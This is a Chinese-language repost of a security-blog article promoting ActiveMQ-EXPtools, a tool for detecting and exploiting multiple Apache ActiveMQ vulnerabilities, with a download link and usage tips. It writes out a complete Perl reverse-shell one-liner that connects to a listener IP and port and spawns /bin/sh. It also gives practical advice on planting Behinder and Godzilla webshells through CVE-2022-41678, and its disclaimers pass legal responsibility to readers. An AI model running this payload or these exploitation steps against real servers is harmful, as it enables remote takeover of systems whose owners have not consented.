文章总结: 本文介绍ActiveMQ-EXPtools工具,支持检测和利用ApacheActiveMQ多个漏洞(CVE-2015-5254、CVE-2016-3088等),提供反序列化利用、webshell写入等实操方法,包含工具下载链接和漏洞验证示例,适用于安全研究人员进行漏洞验证和渗透测试。 综合评分: 68 文章分类: 漏洞分析,安全工具,WEB安全,红队,渗透测试
ActiveMQ-EXPtools | Apache ActiveMQ全系列漏洞一键支持检测和利用工具
Catherines77 Catherines77
李白你好
2026年4月21日 08:01 青海
在小说阅读器读本章
去阅读
免责声明:由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
工具介绍
ActiveMQ-EXPtools支持检测和利用Apache ActiveMQ漏洞,CVE-2015-5254,CVE-2016-3088,CVE-2022-41678,CVE-2023-46604,CVE-2024-32114,CVE-2026-34197。作者:Catherines77
漏洞利用说明
CVE-2015-5254
java-chains生成反序列化数据,验证漏洞时可以用URLDNS
在反弹shell时最好用perl,sh和bash有时弹不了
/usr/bin/perl -e 'use Socket;$i="192.168.239.129";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
CVE-2022-41678
自定义webshell写入时,冰蝎马写入会报500,哥斯拉正常。工具连接时注意要加上认证头部
参考致谢
https://github.com/URJACK2025/CVE-2022-41678
https://github.com/vulhub/vulhub
https://github.com/vulhub/java-chains
工具下载
https://github.com/Catherines77/ActiveMQ-EXPtools/releases/tag/1.0
网络安全情报攻防站
www.libaisec.com
综合性的技术交流与资源共享社区
专注于红蓝对抗、攻防渗透、威胁情报、数据泄露
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:李白你好 Catherines77 Catherines77《ActiveMQ-EXPtools | Apache ActiveMQ全系列漏洞一键支持检测和利用工具》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论